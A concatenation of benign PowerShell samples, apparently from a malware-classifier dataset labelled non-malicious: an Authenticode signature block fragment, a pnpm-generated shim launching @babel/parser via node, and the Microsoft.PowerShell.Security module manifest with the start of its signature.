+HX/aREQ7SqYZz59sXM2ySOfvYyIjnqSO80NGBaz5DvzIG88J0+BNhOu2jl6Dfcq # jYQs1H/PMSQIK6E7lXDXSpXzAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUnMc7Zn/ukKBsBiWkwdNfsN5pdwAw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMDUxNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAD21v9pHoLdBSNlFAjmk # mx4XxOZAPsVxxXbDyQv1+kGDe9XpgBnT1lXnx7JDpFMKBwAyIwdInmvhK9pGBa31 # TyeL3p7R2s0L8SABPPRJHAEk4NHpBXxHjm4TKjezAbSqqbgsy10Y7KApy+9UrKa2 # kGmsuASsk95PVm5vem7OmTs42vm0BJUU+JPQLg8Y/sdj3TtSfLYYZAaJwTAIgi7d # hzn5hatLo7Dhz+4T+MrFd+6LUa2U3zr97QwzDthx+RP9/RZnur4inzSQsG5DCVIM # pA1l2NWEA3KAca0tI2l6hQNYsaKL1kefdfHCrPxEry8onJjyGGv9YKoLv6AOO7Oh # JEmbQlz/xksYG2N/JSOJ+QqYpGTEuYFYVWain7He6jgb41JbpOGKDdE/b+V2q/gX # UgFe2gdwTpCDsvh8SMRoq1/BNXcr7iTAU38Vgr83iVtPYmFhZOVM0ULp/kKTVoir # IpP2KCxT4OekOctt8grYnhJ16QMjmMv5o53hjNFXOxigkQWYzUO+6w50g0FAeFa8 # 5ugCCB6lXEk21FFB1FdIHpjSQf+LP/W2OV/HfhC3uTPgKbRtXo83TZYEudooyZ/A # Vu08sibZ3MkGOJORLERNwKm2G7oqdOv4Qj8Z0JrGgMzj46NFKAxkLSpE5oHQYP1H # tPx1lPfD7iNSbJsP6LiUHXH1MIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAANOtTx6wYRv6ysAAAAAA04wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIL5G17QsCTlJ95/MXa+iek97 # F3aNaICF6lDtaeAYGBvcMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAmVmCfdr+JZnOlal3wGjholWux/o/eV1rCSVPpGxMW3R9fcJVI+EQ/FBD # CCwaQJ2CSyZP4QNQSa6G6O59P4tlbPsd9/SbkC29HMC/5Di9omRZYrAWz3S68J+M # QvLODr8yaOo0xpld9/q3qH1BMAviZweCtH+Ft8OG1/Ax2KdX2mYISYjQF/hwLdb9 # 01yc3FW5TI69eQHI57gfZG/Cs52+tVLqRp0qKQGMbboGZdIiT9E/hKsXQp7y20ZO # 3sGpq0bjog4OSF4K8Q4OCs6XDus1uN3/qxtyRu3WTba001Iy3AiCURjeQ/xLmYO/ # SnGFZ3BBbVYPVEeh9zfRGAfS9IlQXqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCCItXUudTmKUry+IKyID1q+BGWcDQfyHW1debSi290zrQIGZQtb4sy/ # GBMyMDIzMTAxNzE4MjMzNS43NDVaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # Ojg2REYtNEJCQy05MzM1MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAG3IScaB6IqhkYAAQAAAbcwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjIw # OTIwMjAyMjE0WhcNMjMxMjE0MjAyMjE0WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4NkRGLTRC # QkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMf9z1dQNBNkTBq3HJclypjQ # cJIlDAgpvsw4vHJe06n532RKGkcn0V7p65OeA1wOoO+8NsopnjPpVZ8+4s/RhdMC # MNPQJXoWdkWOp/3puIEs1fzPBgTJrdmzdyUYzrAloICYx722gmdpbNf3P0y5Z2gR # O48sWIYyYeNJYch+ZfJzXqqvuvq7G8Nm8IMQi8Zayvx+5dSGBM5VYHBxCEjXF9EN # 6Qw7A60SaXjKjojSpUmpaM4FmVec985PNdSh8hOeP2tL781SBan92DT19tfNHv9H # 0FAmE2HGRwizHkJ//mAZdS0s6bi/UwPMksAia5bpnIDBOoaYdWkV0lVG5rN0+ltR # z9zjlaH9uhdGTJ+WiNKOr7mRnlzYQA53ftSSJBqsEpTzCv7c673fdvltx3y48Per # 6vc6UR5e4kSZsH141IhxhmRR2SmEabuYKOTdO7Q/vlvAfQxuEnJ93NL4LYV1IWw8 # O+xNO6gljrBpCOfOOTQgWJF+M6/IPyuYrcv79Lu7lc67S+U9MEu2dog0MuJIoYCM # iuVaXS5+FmOJiyfiCZm0VJsJ570y9k/tEQe6aQR9MxDW1p2F3HWebolXj9su7zrr # ElNlHAEvpFhcgoMniylNTiTZzLwUj7TH83gnugw1FCEVVh5U9lwNMPL1IGuz/3U+ # RT9wZCBJYIrFJPd6k8UtAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUs/I5Pgw0JAVh # DdYB2yPII8l4tOwwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAA2dZMybhVxSXTbJ # zFgvNiMCV5/Ayn5UuzJU495YDtcefold0ehR9QBGBhHmAMt10WYCHz2WQUyM3mQD # 4IsHfEL1JEwgG9tGq71ucn9dknLBHD30JvbQRhIKcvFSnvRCCpVpilM8F/YaWXC9 # VibSef/PU2GWA+1zs64VFxJqHeuy8KqrQyfF20SCnd8zRZl4YYBcjh9G0GjhJHUP # AYEx0r8jSWjyi2o2WAHD6CppBtkwnZSf7A68DL4OwwBpmFB3+vubjgNwaICS+fkG # VvRnP2ZgmlfnaAas8Mx7igJqciqq0Q6An+0rHj1kxisNdIiTzFlu5Gw2ehXpLrl5 # 9kvsmONVAJHhndpx3n/0r76TH+3WNS9UT9jbxQkE+t2thif6MK5krFMnkBICCR/D # VcV1qw9sg6sMEo0wWSXlQYXvcQWA65eVzSkosylhIlIZZLL3GHZD1LQtAjp2A5F7 # C3Iw4Nt7C7aDCfpFxom3ZulRnFJollPHb3unj9hA9xvRiKnWMAMpS4MZAoiV4O29 # zWKZdUzygp7gD4WjKK115KCJ0ovEcf92AnwMAXMnNs1o0LCszg+uDmiQZs5eR7jz # dKzVfF1z7bfDYNPAJvm5pSQdby3wIOsN/stYjM+EkaPtUzr8OyMwrG+jpFMbsB4c # fN6tvIeGtrtklMJFtnF68CcZZ5IAMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4 # NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAyGdBGMObODlsGBZmSUX2oWgfqcaggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOjYxugwIhgPMjAyMzEwMTcxNjQwMDhaGA8yMDIzMTAxODE2NDAwOFowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6NjG6AIBADAHAgEAAgIA9DAHAgEAAgIT7TAKAgUA # 6NoYaAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBALR11lLZ5xDFzYJ20neD # frdA51k5OpUEuRxd6PHCdzCIQO1JP+P+meqm5TfXVXBZjVBvHWpPI7OJY0NZY0Qw # GQ+JROAZ2NPHpkUNGdPDaMOXLttADVGR+JqgwKzsxd5H1MF2w7Jo2vQPrfVvFmxb # FI8fTRXQkBcSLEttuHehDEEoMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAG3IScaB6IqhkYAAQAAAbcwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgzM0kwQwwGLhw6em8WCTKKJN0Kbrod/3/3On+CkQTLDYwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCBsJ3jTsh7aL8hNeiYGL5/8IBn8zUfr7/Q7rkM8ic1w # QTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAABtyEn # GgeiKoZGAAEAAAG3MCIEIDBu+EAgT6PBw05WjTF0wuAJZHMf1p9QwrtMdZP5Q2YY # MA0GCSqGSIb3DQEBCwUABIICAGwilVtnN0hPmcpHkVj4IQBw2/4TO83BTWY9/3Dz # 0Vu6508x5Miv7MsgYqbm3CmOWcd+ZMzNcT9HHh/jjXPtJhBJHpJZtlid28vy4+Xf # XdV3dFcUcijc372IwI/PweKUj/8DpUdKU4XgdzzemeIl6AwJl8mvy81XWaeK0852 # 3Fu/GRbHug/ylzlKGQQrNBOn6/7qK2qoZOakOkJHqKicRdNBqhZmZnpmkMpRbEyj # Igpo05m5/9bKguyDSWnzowmCVeUoeZla+ZN5suEPtLPp09v9AIwV/czDTjpNQVUu # 3csZhlLhZi2UsEzGRhDOIy9RYUXkyAOBimJCV32rFHxX/0Htz4bTrU2M0sIflCP9 # Tc+pbRBntpSM6IB0Ht54BQHXRjYtdcSYGjoRQOrl9ES8gJ7kAQeJZ3kpfopuYOI7 # tgHletYaHtijUgYJVnWmF+oGID+kDAZjXoZIyBWRRG7DC56Rs/GopESwiNegnYXD # pNKQDB0U0X1mj8yFovLYeeM+oIFftGlBy5N7IGbD19a2tDtA9L9CeSisofkzBFbD # LuQV3RdYZCkk8FW+45xXQVF7xQ1qWwDA6zdm/dPUGn0z25ovMH9TYzhBLZ856lsE # HB+zWGi/paW7tOLfG59uLP3r4Ze5ReGZPztPANY9kZ143FCWTeE/qzEGjQM5/G+X # 3nj2 # SIG # End signature block
combined_dataset/train/non-malicious/sample_36_85.ps1
sample_36_85.ps1
#!/usr/bin/env pwsh $basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent $exe="" $pathsep=":" $env_node_path=$env:NODE_PATH $new_node_path="C:\Users\abder\component-maker\web\node_modules\.pnpm\@babel+parser@7.23.9\node_modules\@babel\parser\bin\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\@babel+parser@7.23.9\node_modules\@babel\parser\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\@babel+parser@7.23.9\node_modules\@babel\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\@babel+parser@7.23.9\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\node_modules" if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) { # Fix case when both the Windows and Linux builds of Node # are installed in the same directory $exe=".exe" $pathsep=";" } else { $new_node_path="/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/@babel+parser@7.23.9/node_modules/@babel/parser/bin/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/@babel+parser@7.23.9/node_modules/@babel/parser/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/@babel+parser@7.23.9/node_modules/@babel/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/@babel+parser@7.23.9/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/node_modules" } if ([string]::IsNullOrEmpty($env_node_path)) { $env:NODE_PATH=$new_node_path } else { $env:NODE_PATH="$new_node_path$pathsep$env_node_path" } $ret=0 if (Test-Path "$basedir/node$exe") { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "$basedir/node$exe" "$basedir/../../../../../../@babel+parser@7.23.9/node_modules/@babel/parser/bin/babel-parser.js" $args } else { & "$basedir/node$exe" "$basedir/../../../../../../@babel+parser@7.23.9/node_modules/@babel/parser/bin/babel-parser.js" $args } $ret=$LASTEXITCODE } else { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "node$exe" "$basedir/../../../../../../@babel+parser@7.23.9/node_modules/@babel/parser/bin/babel-parser.js" $args } else { & "node$exe" "$basedir/../../../../../../@babel+parser@7.23.9/node_modules/@babel/parser/bin/babel-parser.js" $args } $ret=$LASTEXITCODE } $env:NODE_PATH=$env_node_path exit $ret
combined_dataset/train/non-malicious/sample_67_86.ps1
sample_67_86.ps1
@{ GUID = "A94C8C7E-9810-47C0-B8AF-65089C13A35A" Author = "PowerShell" CompanyName = "Microsoft Corporation" Copyright = "Copyright (c) Microsoft Corporation." ModuleVersion = "7.0.0.0" CompatiblePSEditions = @("Core") PowerShellVersion = "3.0" FunctionsToExport = @() CmdletsToExport = "Get-Acl", "Set-Acl", "Get-PfxCertificate", "Get-Credential", "Get-ExecutionPolicy", "Set-ExecutionPolicy", "Get-AuthenticodeSignature", "Set-AuthenticodeSignature", "ConvertFrom-SecureString", "ConvertTo-SecureString", "Get-CmsMessage", "Unprotect-CmsMessage", "Protect-CmsMessage" , "New-FileCatalog" , "Test-FileCatalog" AliasesToExport = @() NestedModules = "Microsoft.PowerShell.Security.dll" # 'Security.types.ps1xml' refers to types from 'Microsoft.PowerShell.Security.dll' and thus requiring to load the assembly before processing the type file. # We declare 'Microsoft.PowerShell.Security.dll' in 'RequiredAssemblies' so as to make sure it's loaded before the type file processing. RequiredAssemblies = "Microsoft.PowerShell.Security.dll" TypesToProcess = "Security.types.ps1xml" HelpInfoURI = 'https://aka.ms/powershell73-help' } # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDVLXufvm0ZxvzI # 9Y/fQtVmM+ObLJO/wW+M+qyLHwMmUKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 